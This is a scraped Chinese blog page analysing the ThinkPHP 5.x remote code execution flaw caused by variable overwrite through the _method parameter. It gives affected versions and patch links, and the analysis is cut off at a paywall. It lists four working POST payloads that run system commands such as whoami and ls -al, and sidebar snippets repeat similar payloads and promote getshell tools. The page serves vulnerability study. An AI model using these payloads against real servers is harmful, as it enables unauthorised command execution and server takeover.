ThinkPHP 5.x RCE 漏洞分析与利用总结

最新推荐文章于 2024-06-23 19:07:57 发布
最新推荐文章于 2024-06-23 19:07:57 发布
阅读量4.9k 收藏 3
点赞数
文章标签: php python shell
原文链接:http://www.cnblogs.com/iamstudy/articles/thinkphp_5_x_rce_1.html
版权

近日ThinkPHP出现由于变量覆盖而引起的RCE,其漏洞根本源于thinkphp/library/think/Request.php中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。

例如:
1、大部分payload进入最后rce的函数是调用了call_user_func,其可控的也只有一个参数,并且还不能为数组。
2、另外在php7中assert不能使用,或者命令函数被禁用。

接下来将为大家进行漏洞分析以及对各个版本、场景下的利用进行详细的总结。

漏洞范围: <= 5.0.23、<= 5.1.32

5.0.x补丁:
https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003

5.1.x补丁:
https://github.com/top-think/framework/commit/2454cebcdb6c12b352ac0acd4a4e6b25b31982e6

Payload总结

1、<= 5.0.13

POST /?s=index/index

s=whoami&_method=__construct&method=&filter[]=system

2、<= 5.0.23、5.1.0 <= 5.1.16

  • 开启debug()
POST /

_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al

3、<= 5.0.23
需要captcha的method路由,如果存在其他method路由,也是可以将captcha换为其他。

POST /?s=captcha HTTP/1.1

_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami&method=get

4、5.0.0 <= version <= 5.1.32

  • error_reporting(0)关闭报错
POST /

c=exec&f=calc.exe&_method=filter

5.0.0 <= ThinkPHP5 <= 5.1.17

thinkphp/library/think/Request.php中的$this->{$this->method}($_POST);,其中$this->method是可以通过post方式控制,其传入的参数是Config::get('var_method'),默认值为_method,这样将导致我们可以调用Request里面的方法。

public function method($method = false)
{
    if (true === $method) {
        // 获取原始请求类型
        return $this->server('REQUEST_METHOD') ?: 'GET';
    } elseif (!$this->method) {
        if (isset($_POST[Config::get('var_method')])) {
            $this->method = strtoupper($_POST[Config::get('var_method')]);
            $this->{$this->method}($_POST);
        } elseif (isset($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'])) {
            $this->method = strtoupper($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE']);
        } else {
            $this->method = $this->server('REQUEST_METHOD') ?: 'GET';
最低0.47元/天 解锁文章
dengzhasong7076
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp5.0.X 全版本变量覆盖导致的RCE分析
小石的博客
11-12 2405
thinkphp5.0.0分析起 POST /thinkphp5.0.0 HTTP/1.1 Host: www.example.com a=whoami&_method=__construct&filter=system&method=GET 5.0.0版本为什么是这样的Payload? 第一次调用Request下的method方法,看到是检查路由的时候。 _met...
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不到的payload欢迎提交payload至issues。 这个真的超级好用,推荐推荐
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7026
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-23 1069
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
Thinkphp 5.x 未开启强制路由导致RCE分析
weixin_43263451的博客
03-31 2464
这种类型的漏洞是因为框架对于控制器名没有进行足够的校验,在没有开启强制路由的情况下,攻击者可以通过兼容模式调用任意的控制器的操作,从而达到远程命令执行。 1. 影响版本 5.0.7<=thinkphp<=5.0.22 5.1.x 2. 漏洞复现 环境: thinkphp5.0.20+php5.6.27+apache+phpstorm POC: ?s=index/\think\app/invokefunction&function=call_user_func_array&vars
学习笔记-ThinkPHP5之任意方法调用RCE(六)
人饭子的博客
11-09 440
书接上文 利用method的任意方法调用,调用构造函数__construct,且调用时会传入$_POST数据,那么组合起来就是执行method方法可以控制类的成员变量的值。 filterValue中存在 call_user_func函数可以恶意利用,关注其参数$filters是否可控。 getFilter方法存在这样$filter = $filter ?: $this->filter;...
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析利用总结
weixin_34931142的博客
03-19 1237
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
qq_67473072的博客
07-13 4691
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
thinkphp漏洞利用工具-thinkphp_gui_tools(三)
siu~
08-17 3610
ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过
thinkphp5.0.x RCE
fmyyy1的博客
07-28 577
ThinkPHP 5.0.x (<=5.0.23) 5.0.23->5.0.24 对method方法添加了过滤,该方法为获取请求类型,5.0.24中只允许method为常用的几个方法,否则就将其置为POST方法。 在/thinkphp/library/think/Request.php下的filterValue函数下的第五行,调用了call_user_func()方法 private function filterValue(&$value, $key, $filters)
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3823
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
thinkphp漏洞利用工具-ThinkphpGUI(一)
siu~
08-17 3718
Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7105
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
thinkphp3.2.x rce
12-18
ThinkPHP是一个开源的PHP开发框架,它的版本3.2.x是一个老版本,存在远程命令执行(RCE漏洞。这个漏洞允许攻击者通过构造恶意请求来执行任意的系统命令,从而获得对应用服务器的完全控制权限。 这个漏洞的原因是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值